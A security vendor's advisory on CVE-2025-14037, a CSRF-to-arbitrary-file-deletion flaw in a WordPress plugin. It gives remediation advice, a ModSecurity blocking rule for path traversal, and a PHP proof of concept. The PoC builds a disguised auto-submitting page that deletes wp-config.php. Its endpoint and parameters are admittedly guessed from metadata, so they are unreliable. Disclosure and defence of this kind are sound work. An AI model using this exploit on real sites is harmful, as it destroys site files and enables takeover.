Atomic Edge analysis of CVE-2025-14037 (metadata-based):
This vulnerability combines Cross-Site Request Forgery (CSRF) with path traversal in the Invelity Products Feeds WordPress plugin. It allows authenticated administrator-level attackers to delete arbitrary files on the server. The vulnerability exists in all plugin versions up to and including 1.2.6.
Atomic Edge research identifies the root cause as missing CSRF protection and insufficient input validation in the ‘createManageFeedPage’ function. The CWE classification (352) confirms the CSRF component. The description indicates missing validation and sanitization for file path parameters. These conclusions are inferred from the CWE and vulnerability description, as no source code diff is available for confirmation.
Exploitation requires an authenticated administrator to click a malicious link. The attacker crafts a request containing path traversal sequences (like ‘../../wp-config.php’) in a file deletion parameter. This request likely targets a WordPress AJAX endpoint such as ‘/wp-admin/admin-ajax.php’ with an action parameter containing ‘invelity_products_feeds’ or a similar plugin-specific identifier. The attacker embeds this request in a cross-site context to trigger unauthorized file deletion.
Remediation requires implementing two security controls. First, the plugin must add proper nonce verification to the ‘createManageFeedPage’ function using WordPress’s wp_verify_nonce() and wp_create_nonce() functions. Second, the plugin must validate and sanitize file path inputs, restricting deletions to intended directories and preventing traversal sequences. These measures would address both the CSRF and path traversal aspects.
Successful exploitation enables arbitrary file deletion on the server. Attackers can delete critical WordPress files like wp-config.php, causing site disruption and potential credential exposure. They can remove theme or plugin files to disable site functionality. This vulnerability could facilitate complete site takeover if combined with other weaknesses or used as part of a multi-stage attack chain.
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2025-14037 (metadata-based)
# This rule blocks exploitation attempts targeting the Invelity Products Feeds plugin
# It matches requests to the WordPress AJAX endpoint with the plugin's action parameter
# and detects path traversal sequences in the file deletion parameter
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php"
"id:202514037,phase:2,deny,status:403,chain,msg:'CVE-2025-14037: Invelity Products Feeds CSRF to Arbitrary File Deletion',severity:'CRITICAL',tag:'CVE-2025-14037',tag:'WordPress',tag:'Plugin',tag:'Invelity-Products-Feeds'"
SecRule ARGS_POST:action "@rx ^invelity_products_feeds" "chain"
SecRule ARGS_POST:file_path "@rx (../|..\)"
"t:none,t:urlDecodeUni,t:lowercase,setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-14037 - Invelity Products Feeds <= 1.2.6 - Cross-Site Request Forgery to Arbitrary File Deletion
<?php
/**
* Proof of Concept for CVE-2025-14037
* Assumptions based on vulnerability description:
* 1. The vulnerable endpoint is likely /wp-admin/admin-ajax.php
* 2. The action parameter contains 'invelity_products_feeds' or similar
* 3. A file deletion parameter accepts path traversal sequences
* 4. No CSRF protection (nonce) exists
* 5. Administrator privileges are required
*
* This script generates an HTML page containing a malicious form.
* When an authenticated administrator visits this page, the form auto-submits.
* The target file is specified in the $target_file variable.
*/
$target_url = 'https://vulnerable-site.com';
$target_file = '../../wp-config.php'; // Example target file
// Construct the likely AJAX endpoint
$ajax_endpoint = $target_url . '/wp-admin/admin-ajax.php';
// Generate the malicious HTML form
$html = <<<HTML
<!DOCTYPE html>
<html>
<head>
<title>Innocent Page</title>
</head>
<body>
<h2>Loading...</h2>
<form id="exploitForm" method="POST" action="$ajax_endpoint">
<input type="hidden" name="action" value="invelity_products_feeds_delete_file" />
<input type="hidden" name="file_path" value="$target_file" />
<!-- Additional parameters may be required based on actual implementation -->
<input type="hidden" name="operation" value="delete" />
</form>
<script>
// Auto-submit the form when page loads
document.getElementById('exploitForm').submit();
</script>
</body>
</html>
HTML;
echo $html;
?>
